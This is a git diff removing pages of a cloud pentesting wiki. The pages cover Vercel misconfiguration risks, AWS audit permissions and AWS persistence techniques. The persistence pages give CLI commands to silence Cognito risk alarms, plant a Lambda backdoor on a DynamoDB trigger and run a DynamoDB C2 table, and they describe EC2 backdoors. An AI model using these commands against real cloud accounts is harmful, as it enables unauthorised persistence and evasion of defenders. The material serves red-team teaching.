- * **Misconfiguration:** Change the environment used by the domain in production.
- * **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production.
-
-***
-
-### Environments
-
-**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables.
-
-#### Security Configurations:
-
-* **Environment Isolation**
- * **Misconfiguration:** Sharing environment variables across environments.
- * **Risk:** Leakage of production secrets into development or preview environments, increasing exposure.
-* **Access to Sensitive Environments**
- * **Misconfiguration:** Allowing broad access to production environments.
- * **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches.
-
-***
-
-### Environment Variables
-
-**Purpose:** Manage environment-specific variables and secrets used by the application.
-
-#### Security Configurations:
-
-* **Exposing Sensitive Variables**
- * **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- * **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
-* **Sensitive disabled**
- * **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
-* **Shared Environment Variables**
- * **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information.
- * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
-
-***
-
-### Git
-
-**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers.
-
-#### Security Configurations:
-
-* **Ignored Build Step (TODO)**
- * **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE.
- * **Risk:** TBD
-
-***
-
-### Integrations
-
-**Purpose:** Connect third-party services and tools to enhance project functionalities.
-
-#### Security Configurations:
-
-* **Insecure Third-Party Integrations**
- * **Misconfiguration:** Integrating with untrusted or insecure third-party services.
- * **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations.
-* **Over-Permissioned Integrations**
- * **Misconfiguration:** Granting excessive permissions to integrated services.
- * **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions.
-* **Lack of Integration Monitoring**
- * **Misconfiguration:** Failing to monitor and audit third-party integrations.
- * **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches.
-
-***
-
-### Deployment Protection
-
-**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments.
-
-#### Security Configurations:
-
-**Vercel Authentication**
-
-* **Misconfiguration:** Disabling authentication or not enforcing team member checks.
-* **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse.
-
-**Protection Bypass for Automation**
-
-* **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets.
-* **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments.
-
-**Shareable Links**
-
-* **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links.
-* **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions.
-
-**OPTIONS Allowlist**
-
-* **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints.
-* **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks.
-
-**Password Protection**
-
-* **Misconfiguration:** Using weak passwords or sharing them insecurely.
-* **Risk:** Unauthorized access to deployments if passwords are guessed or leaked.
-* **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
-
-**Deployment Protection Exceptions**
-
-* **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently.
-* **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access.
-* **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
-
-**Trusted IPs**
-
-* **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges.
-* **Risk:** Legitimate users being blocked or unauthorized IPs gaining access.
-* **Note:** Available on the **Enterprise** plan.
-
-***
-
-### Functions
-
-**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies.
-
-#### Security Configurations:
-
-* **Nothing**
-
-***
-
-### Data Cache
-
-**Purpose:** Manage caching strategies and settings to optimize performance and control data storage.
-
-#### Security Configurations:
-
-* **Purge Cache**
- * **Misconfiguration:** It allows to delete all the cache.
- * **Risk:** Unauthorized users deleting the cache leading to a potential DoS.
-
-***
-
-### Cron Jobs
-
-**Purpose:** Schedule automated tasks and scripts to run at specified intervals.
-
-#### Security Configurations:
-
-* **Disable Cron Job**
- * **Misconfiguration:** It allows to disable cron jobs declared inside the code
- * **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for)
-
-***
-
-### Log Drains
-
-**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing.
-
-#### Security Configurations:
-
-* Nothing (managed from teams settings)
-
-***
-
-### Security
-
-**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more.
-
-#### Security Configurations:
-
-**Build Logs and Source Protection**
-
-* **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly.
-* **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities.
-
-**Git Fork Protection**
-
-* **Misconfiguration:** Allowing unauthorized pull requests without proper reviews.
-* **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors.
-
-**Secure Backend Access with OIDC Federation**
-
-* **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs.
-* **Risk:** Unauthorized access to backend services through flawed authentication flows.
-
-**Deployment Retention Policy**
-
-* **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention).
-* **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments.
-
-**Recently Deleted Deployments**
-
-* **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions.
-* **Risk:** Loss of critical deployment history, hindering audits and rollbacks.
-
-***
-
-### Advanced
-
-**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security.
-
-#### Security Configurations:
-
-**Directory Listing**
-
-* **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file.
-* **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks.
-
-***
-
-## Project Firewall
-
-### Firewall
-
-#### Security Configurations:
-
-**Enable Attack Challenge Mode**
-
-* **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability
-* **Risk:** Potential user experience problems.
-
-### Custom Rules & IP Blocking
-
-* **Misconfiguration:** Allows to unblock/block traffic
-* **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic
-
-***
-
-## Project Deployment
-
-### Source
-
-* **Misconfiguration:** Allows access to read the complete source code of the application
-* **Risk:** Potential exposure of sensitive information
-
-### Skew Protection
-
-* **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other.
-* **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future
-
-***
-
-## Team Settings
-
-### General
-
-#### Security Configurations:
-
-* **Transfer**
- * **Misconfiguration:** Allows to transfer all the projects to another team
- * **Risk:** An attacker could steal the projects
-* **Delete Project**
- * **Misconfiguration:** Allows to delete the team with all the projects
- * **Risk:** Delete the projects
-
-***
-
-### Billing
-
-#### Security Configurations:
-
-* **Speed Insights Cost Limit**
- * **Misconfiguration:** An attacker could increase this number
- * **Risk:** Increased costs
-
-***
-
-### Members
-
-#### Security Configurations:
-
-* **Add members**
- * **Misconfiguration:** An attacker could maintain persitence inviting an account he control
- * **Risk:** Attacker persistence
-* **Roles**
- * **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration.
Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
- * **Risk**: Increate the exposure of the Vercel Team
-
-***
-
-### Access Groups
-
-An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects.
-
-**Potential Misconfigurations:**
-
-* **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions.
-* **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation.
-* **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended.
-* **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions.
-* **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps.
-
-***
-
-### Log Drains
-
-#### Security Configurations:
-
-* **Log Drains to third parties:**
- * **Misconfiguration:** An attacker could configure a Log Drain to steal the logs
- * **Risk:** Partial persistence
-
-***
-
-### Security & Privacy
-
-#### Security Configurations:
-
-* **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard.
- * **Misconfiguration:**
- * Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting.
- * Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain.
- * **Risks:** - * **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team. - * **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals. -* **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access. - * **Misconfiguration:** Not adding critical Git scopes to the protected list. -* **Risks:** - * **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization. - * **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team. -* **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system. - * **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled. - * **Risks:** - * **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members. - * **Data Breach:** Sensitive information like API keys and credentials could be leaked. -* **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members. - * **Misconfiguration:**\ - Granting access to audit logs to unauthorized team members. - * **Risks:** - * **Privacy Violations:** Exposure of sensitive user activities and data. - * **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks. 
-* **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management. - * **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints. - * **Risk:** Maintain persistence -* **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains. - * **Misconfiguration:** Leaving IP address visibility enabled without necessity. - * **Risks:** - * **Privacy Violations:** Non-compliance with data protection regulations like GDPR. - * **Legal Repercussions:** Potential fines and penalties for mishandling personal data. -* **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing. - * **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic. - * **Risks:** - * **Service Denial to Legitimate Users:** Blocking access for valid users or partners. - * **Operational Disruptions:** Loss of service availability for certain regions or clients. - -*** - -### Secure Compute - -**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy. - -#### **Potential Misconfigurations and Risks** - -1. **Incorrect AWS Region Selection** - * **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region. - * **Risk:** Increased latency, potential data residency compliance issues, and degraded performance. -2. 
**Overlapping CIDR Blocks** - * **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks. - * **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks. -3. **Improper VPC Peering Configuration** - * **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates). - * **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches. -4. **Excessive Project Assignments** - * **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation. - * **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others. -5. **Inadequate IP Address Management** - * **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately. - * **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities. -6. **Including Build Containers Unnecessarily** - * **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds. - * **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources. -7. **Failure to Securely Handle Bypass Secrets** - * **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections. - * **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code. -8. **Ignoring Region Failover Configurations** - * **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings. - * **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency. -9. 
**Exceeding VPC Peering Connection Limits** - * **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections). - * **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions. -10. **Insecure Network Settings** - * **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network. - * **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks. - -*** - -### Environment Variables - -**Purpose:** Manage environment-specific variables and secrets used by all the projects. - -#### Security Configurations: - -* **Exposing Sensitive Variables** - * **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - * **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -* **Sensitive disabled** - * **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
deleted file mode 100644
index 868bfe63a..000000000
--- a/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
+++ /dev/null
@@ -1,43 +0,0 @@
-# AWS - Permissions for a Pentest
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools:
-
-* The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
-* To run [aws\_iam\_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions:
- * **access-analyzer:List\***
- * **access-analyzer:Get\***
- * **iam:CreateServiceLinkedRole**
- * **access-analyzer:CreateAnalyzer**
- * Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission)
- * **access-analyzer:DeleteAnalyzer**
- * Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
deleted file mode 100644
index eeeaca42b..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
+++ /dev/null
@@ -1,58 +0,0 @@
-# AWS - API Gateway Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## API Gateway
-
-For more information go to:
-
-{% content-ref url="../aws-services/aws-api-gateway-enum.md" %}
-[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md)
-{% endcontent-ref %}
-
-### Resource Policy
-
-Modify the resource policy of the API gateway(s) to grant yourself access to them
-
-### Modify Lambda Authorizers
-
-Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
-Or just remove the use of the authorizer.
-
-### IAM Permissions
-
-If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\
-Or just remove the use of the authorizer.
-
-### API Keys
-
-If API keys are used, you could leak them to maintain persistence or even create new ones.\
-Or just remove the use of API keys.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
deleted file mode 100644
index ce324c3a2..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
+++ /dev/null
@@ -1,70 +0,0 @@
-# AWS - Cognito Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Cognito
-
-For more information, access:
-
-{% content-ref url="../aws-services/aws-cognito-enum/" %}
-[aws-cognito-enum](../aws-services/aws-cognito-enum/)
-{% endcontent-ref %}
-
-### User persistence
-
-Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like:
-
-* **Adding a User Pool** controlled by the user to an Identity Pool
-* Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
- * Or to an **authenticated Identity Pool** if the attacker can login
- * Or **improve the permissions** of the given roles
-* **Create, verify & privesc** via attributes controlled users or new users in a **User Pool**
-* **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
-
-Check how to do these actions in
-
-{% content-ref url="../aws-privilege-escalation/aws-cognito-privesc.md" %}
-[aws-cognito-privesc.md](../aws-privilege-escalation/aws-cognito-privesc.md)
-{% endcontent-ref %}
-
-### `cognito-idp:SetRiskConfiguration`
-
-An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options:
-
-{% code overflow="wrap" %}
-```bash
-aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
-```
-{% endcode %}
-
-By default this is disabled:
-
-
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
deleted file mode 100644
index c8ddc156e..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
+++ /dev/null
@@ -1,91 +0,0 @@
-# AWS - DynamoDB Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### DynamoDB
-
-For more information access:
-
-{% content-ref url="../aws-services/aws-dynamodb-enum.md" %}
-[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md)
-{% endcontent-ref %}
-
-### DynamoDB Triggers with Lambda Backdoor
-
-Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
-
-{% code overflow="wrap" %}
-```bash
-# Create a malicious Lambda function
-aws lambda create-function \
- --function-name MaliciousFunction \
- --runtime nodejs14.x \
- --role \
- --handler index.handler \
- --zip-file fileb://malicious_function.zip \
- --region
-
-# Associate the Lambda function with the DynamoDB table as a trigger
-aws dynamodbstreams describe-stream \
- --table-name TargetTable \
- --region
-
-# Note the "StreamArn" from the output
-aws lambda create-event-source-mapping \
- --function-name MaliciousFunction \
- --event-source \
- --region
-```
-{% endcode %}
-
-To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
-
-### DynamoDB as a C2 Channel
-
-An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
-
-```bash
-# Create a DynamoDB table for C2
-aws dynamodb create-table \
- --table-name C2Table \
- --attribute-definitions AttributeName=CommandId,AttributeType=S \
- --key-schema AttributeName=CommandId,KeyType=HASH \
- --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
- --region
-
-# Insert a command into the table
-aws dynamodb put-item \
- --table-name C2Table \
- --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
- --region
-```
-
-The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
deleted file mode 100644
index e2f500bf0..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
+++ /dev/null
@@ -1,80 +0,0 @@
-# AWS - EC2 Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## EC2
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %}
-[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/)
-{% endcontent-ref %}
-
-### Security Group Connection Tracking Persistence
-
-If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic.
-
-If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
-
-### EC2 Lifecycle Manager
-
-This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
-An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
-
-### Scheduled Instances
-
-It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access.
-
-### Spot Fleet Request
-
-Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**.
-
-### Backdoor Instances
-
-An attacker could get access to the instances and backdoor them:
-
-* Using a traditional **rootkit** for example
-* Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
-* Backdooring the **User Data**
-
-### **Backdoor Launch Configuration**
-
-* Backdoor the used AMI
-* Backdoor the User Data
-* Backdoor the Key Pair
-
-### VPN
-
-Create a VPN so the attacker will be able to connect directly through i to the VPC.
-
-### VPC Peering
-
